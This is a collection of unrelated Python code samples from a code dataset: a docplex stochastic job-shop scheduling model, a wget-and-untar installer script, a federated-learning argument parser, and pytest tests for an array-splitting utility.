This example illustrates how to solve a Stochastic Job-Shop Scheduling
problem using a scenario-based approach. A set of n scenarios is created,
each scenario represents a particular realization of the durations of
the operations.
The instance is a small 6x6 Job-Shop Scheduling problem with 20 scenarios.
In the example we suppose the scenarios are given as input. In practical
problems, these scenarios may be given by a selection of representative
past execution of the system or they may be computed by sampling the
probability distributions of operations duration.
For example the different scenarios give the following durations
for the 6 operations of the first job:
JOB #1
Machine: M5 -> M1 -> M4 -> M3 -> M0 -> M2
Duration in scenario #00: 218 284 321 201 101 199
Duration in scenario #01: 259 313 311 191 93 211
...
Duration in scenario #19: 501 309 301 203 95 213
The objective is to find a robust sequencing of operations on machines so
as to minimize the expected makespan across all scenarios.
The problem can be seen as a particular case of Two-Stage Stochastic
Programming problem where first stage decision variables are the sequences
of operations on machines and second stage decision variables are the
actual start/end time of operations that will depend on the actual duration
of operations at execution time.
The model proposed here generalizes to any type of stochastic scheduling
problem where first stage decision variables involve creating robust
sequences of operations on a machine.
Model
-----
Each scenario is modeled as a particular deterministic Job-Shop Scheduling
problem.
Let makespan[k] denote the makespan of scenario k and sequence[k][j] denote
the sequence variable representing the sequencing of operations on machine
j in scenario k.
A set of 'sameSequence' constraints are posted across all scenarios k to
state that for a machine j, the sequence of operations should be the same
for all scenarios. The sequence variable of the first scenario (sequence[0][j])
is used as reference:
for j, for 0<k: sameSequence(sequence[0][j],sequence[k][j])
The global objective function is the average makespan over the different
scenarios:
objective: (sum(k) makespan[k]) / nbScenarios
Solution quality
----------------
Solution with expected makespan 4648.4 is in fact optimal.
Note that the solution built by using the optimal solution of the
deterministic Job-Shop Scheduling problem using average operation duration
yields an expected makespan of 4749.6 which is clearly suboptimal.
Please refer to documentation for appropriate setup of solving configuration.
"""
from docplex.cp.model import CpoModel, INT_MAX
import docplex.cp.utils_visu as visu
import os
#-----------------------------------------------------------------------------
# Initialize the problem data
#-----------------------------------------------------------------------------
# Read next non empty line
def next_int_line(f):
    """Return the next non-empty line of file *f* parsed as a list of ints.

    Blank / whitespace-only lines are skipped.

    Raises:
        EOFError: if the file ends before a non-empty line is found.
            (The original looped forever at EOF, because readline()
            returns "" indefinitely and "".split() is falsy.)
        ValueError: if a token on the line is not an integer.
    """
    while True:
        line = f.readline()
        if not line:  # "" only at end-of-file; "\n" is a blank line
            raise EOFError("unexpected end of data file")
        values = line.split()
        if values:
            return [int(v) for v in values]
# Read the input data file.
# First line contains the number of jobs, the number of machines and the number of scenarios.
# The next nb_jobs lines are ordered sequence of machines for each job
# The next nb_scenarios * nb_jobs lines are the value of durations of each operation for each scenario
filename = os.path.dirname(os.path.abspath(__file__)) + "/data/stochastic_jobshop_default.data"
# NOTE(review): `data` is assigned but never used afterwards — dead variable.
data = []
with open(filename, "r") as file:
    # Problem dimensions: NB_JOBS x NB_MACHINES, with NB_SCENARIOS duration scenarios.
    NB_JOBS, NB_MACHINES, NB_SCENARIOS = next_int_line(file)
    # MACHINES[i][j]: machine used by the j-th operation of job i.
    MACHINES = [next_int_line(file) for i in range(NB_JOBS)]
    # DURATIONS[k][i][j]: duration of operation j of job i under scenario k.
    DURATIONS = [[next_int_line(file) for i in range(NB_JOBS)] for k in range(NB_SCENARIOS)]
#-----------------------------------------------------------------------------
# Build the model
#-----------------------------------------------------------------------------
# Create model
mdl = CpoModel()
# Build sub-model corresponding to the kth scenario
def make_scenario_submodel(k):
    """Build the deterministic job-shop submodel for scenario *k*.

    Creates one interval variable per (job, operation) sized with that
    scenario's duration, chains each job's operations in order, posts a
    no-overlap sequence per machine, and constrains an integer makespan
    variable to the latest completion time across jobs.

    Returns:
        (sequence variables, one per machine; makespan variable)
    """
    # ops[i][j]: interval for operation j of job i in scenario k.
    ops = [
        [mdl.interval_var(size=DURATIONS[k][i][j],
                          name="O{}-{}-{}".format(k, i, j))
         for j in range(NB_MACHINES)]
        for i in range(NB_JOBS)
    ]
    # Group intervals by machine, and chain each job's operations.
    per_machine = [[] for _ in range(NB_MACHINES)]
    for i in range(NB_JOBS):
        for j in range(NB_MACHINES):
            per_machine[MACHINES[i][j]].append(ops[i][j])
            if j > 0:
                mdl.add(mdl.end_before_start(ops[i][j - 1], ops[i][j]))
    seqs = [mdl.sequence_var(per_machine[j], name="S{}:M{}".format(k, j))
            for j in range(NB_MACHINES)]
    for seq in seqs:
        mdl.add(mdl.no_overlap(seq))
    # Makespan = completion time of the last operation of every job.
    mk = mdl.integer_var(0, INT_MAX, name='makespan' + str(k))
    mdl.add(mk == mdl.max([mdl.end_of(ops[i][NB_MACHINES - 1]) for i in range(NB_JOBS)]))
    return seqs, mk
# Initialize working variables
ref_sequences = []
makespans = []
# Build all possible scenarios
for k in range(NB_SCENARIOS):
    sequences, makespan = make_scenario_submodel(k)
    makespans.append(makespan)
    if k == 0:
        # Scenario 0's sequences are the reference (first-stage) decisions.
        ref_sequences = sequences
    else:
        # Force every scenario to use the same operation order per machine
        # as the reference scenario (the robust sequencing constraint).
        for j in range(NB_MACHINES):
            mdl.add(mdl.same_sequence(ref_sequences[j], sequences[j]))
# Minimize average makespan
expected_makespan = mdl.sum(makespans) / NB_SCENARIOS
mdl.add(mdl.minimize(expected_makespan))
#-----------------------------------------------------------------------------
# Solve the model and display the result
#-----------------------------------------------------------------------------
# Solve model
print("Solving model....")
msol = mdl.solve(TimeLimit=10, FailLimit=250000)
print("Solution: ")
msol.print_solution()
if msol and visu.is_visu_enabled():
    # NOTE(review): redundant re-import — `visu` is already imported at the
    # top of the file under the same alias.
    import docplex.cp.utils_visu as visu
    import matplotlib.pyplot as plt
    # Histogram of per-scenario makespans, with the expected makespan marked.
    makespan_values = [msol.get_var_solution(m).get_value() for m in makespans]
    plt.hist(makespan_values, color='skyblue')
    plt.axvline(msol.get_objective_values()[0], color='navy', linestyle='dashed', linewidth=2)
    plt.title("Makespan histogram")
    plt.xlabel("Value")
    plt.ylabel("Frequency")
    # Gantt-style timeline of the reference (scenario 0) machine sequences.
    visu.timeline("Solution sequencing for stochastic job-shop " + filename)
    visu.panel("Machines")
    for j in range(NB_MACHINES):
        visu.sequence(name='M' + str(j))
        itvs = msol.get_var_solution(ref_sequences[j]).get_value()
        for v in itvs:
            # Interval names are "O{scenario}-{job}-{operation}"; the first
            # piece ("O0") is discarded, job index i labels the interval.
            k, i, m = v.get_name().split('-')
            visu.interval(v, int(i), 'O' + i + '-' + m)
    visu.show()
| StarcoderdataPython |
4950096 | <reponame>sre-ish/website<gh_stars>0
#!/bin/python
# Download a tgz file from a pre-defined URL
# Uncompresses it and install it under a directory (e.g /shared/)
import os
import sys
import tarfile
def untar(d, f):
    """Extract the tar archive named *f* located in directory *d* into *d*.

    Uses os.path.join instead of raw string concatenation (the original
    required *d* to end with a separator) and a context manager so the
    archive handle is closed even if extraction raises.
    """
    fpath = os.path.join(d, f)
    with tarfile.open(fpath) as tar:
        # NOTE(review): extractall trusts member paths; for untrusted
        # archives pass filter="data" (Python 3.12+, backported to
        # security releases of 3.8+) to block path traversal.
        tar.extractall(d)
# --- * ---
def downl(u):
    """Fetch URL *u* via wget (command prefix from the module-level
    ``wget_cmd``) and return the URL's final path component, i.e. the
    expected local file name."""
    command = wget_cmd + u
    os.system(command)
    return u.rsplit('/', 1)[-1]
# --- Main Program --- #
# Archive to fetch and the directory it is installed under.
url = "https://www.dropbox.com/afile.tgz"
dest = "/shared/"
# wget options: no-clobber, resume, retry forever with a 5s read timeout.
wget_cmd = "wget -P " + dest + " -nc -c --read-timeout=5 --tries=0 "
if __name__ == "__main__":
    # Download, then unpack only if the file arrived and looks like a .tgz.
    fl = downl(url)
    if os.path.isfile(dest + fl):
        if fl.split('.')[-1] == "tgz":
            untar(dest,fl)
            # Normalize ownership/permissions of everything under dest,
            # then drop a marker file signalling the unpack completed.
            os.system("chown -R root:root " + dest + "*")
            os.system("chmod -R 755 " + dest + "*")
            os.system("touch " + dest + "biosoft.unpacked")
| StarcoderdataPython |
1773112 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python version: 3.6
import argparse
def args_parser(argv=None):
    """Parse the federated-learning command-line arguments.

    Args:
        argv: optional list of argument strings. Defaults to None, in
            which case argparse reads sys.argv[1:] exactly as before;
            passing an explicit list makes the parser unit-testable.

    Returns:
        argparse.Namespace with the parsed options.
    """
    parser = argparse.ArgumentParser()
    # federated arguments
    parser.add_argument('--alg', type=str, default='fedavg', choices=['fedavg', 'fedprox'], help="client nets aggregation algorithm")
    parser.add_argument('--epochs', type=int, default=10, help="rounds of training")
    parser.add_argument('--num_users', type=int, default=100, help="number of users: K")
    parser.add_argument('--frac', type=float, default=0.1, help="the fraction of clients: C")
    parser.add_argument('--local_ep', type=int, default=5, help="the number of local epochs: E")
    parser.add_argument('--local_bs', type=int, default=10, help="local batch size: B")
    parser.add_argument('--bs', type=int, default=128, help="test batch size")
    parser.add_argument('--lr', type=float, default=0.01, help="learning rate")
    parser.add_argument('--momentum', type=float, default=0.5, help="SGD momentum (default: 0.5)")

    # model arguments
    parser.add_argument('--model', type=str, default='lenet', help='model name')

    # other arguments
    parser.add_argument('--dataset', type=str, default='mnist', help="name of dataset")
    parser.add_argument('--iid', action='store_true', help='whether i.i.d or not')
    # NOTE: --alpha is kept as a *string* (no type=) with string choices,
    # matching the original behavior; downstream code receives e.g. '0.05'.
    parser.add_argument('--alpha', default='0.05', choices=['0.00', '0.05', '0.10', '0.20', '0.50', '1.00', '10.00', '100.00'], help='controls the iid-ness of the dataset split')
    parser.add_argument('--gpu', type=int, default=0, help="GPU ID, -1 for CPU")
    parser.add_argument('--seed', type=int, default=1, help='random seed (default: 1)')
    parser.add_argument('--all_clients', action='store_true', help='aggregation over all clients')
    args = parser.parse_args(argv)
    return args
| StarcoderdataPython |
324911 | <gh_stars>100-1000
""" test utils functions """
# pylint: disable= invalid-name
import numpy as np
import pytest
from autofaiss.utils.array_functions import multi_array_split
def test_multi_array_split():
    """test multi_array_split fct number 1"""
    # Splitting two aligned 123-row arrays into 41 chunks must yield
    # exactly 41 chunk pairs.
    arrays = [np.zeros((123, 2)), np.zeros((123, 5))]
    chunks = list(multi_array_split(arrays, 41))
    assert len(chunks) == 41
@pytest.mark.parametrize("seed", list(range(1, 10)))
def test_multi_array_split_2(seed):
    """test multi_array_split fct number 2"""
    # Random round-trip: splitting two aligned arrays into chunks and
    # concatenating the chunks back must reproduce the originals.
    # NB: the np.random calls below must stay in this exact order so the
    # seeded draws match the original test.
    np.random.seed(seed)
    n_rows = np.random.randint(1, 100)
    n_chunks = np.random.randint(1, n_rows + 1)
    width_a = np.random.randint(10)
    width_b = np.random.randint(10)
    first = np.random.randint(0, 10000, (n_rows, width_a))
    second = np.random.randint(0, 10000, (n_rows, width_b))
    chunks = list(multi_array_split([first, second], n_chunks))
    rebuilt_first = np.concatenate([pair[0] for pair in chunks])
    rebuilt_second = np.concatenate([pair[1] for pair in chunks])
    assert (first == rebuilt_first).all()
    assert (second == rebuilt_second).all()
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.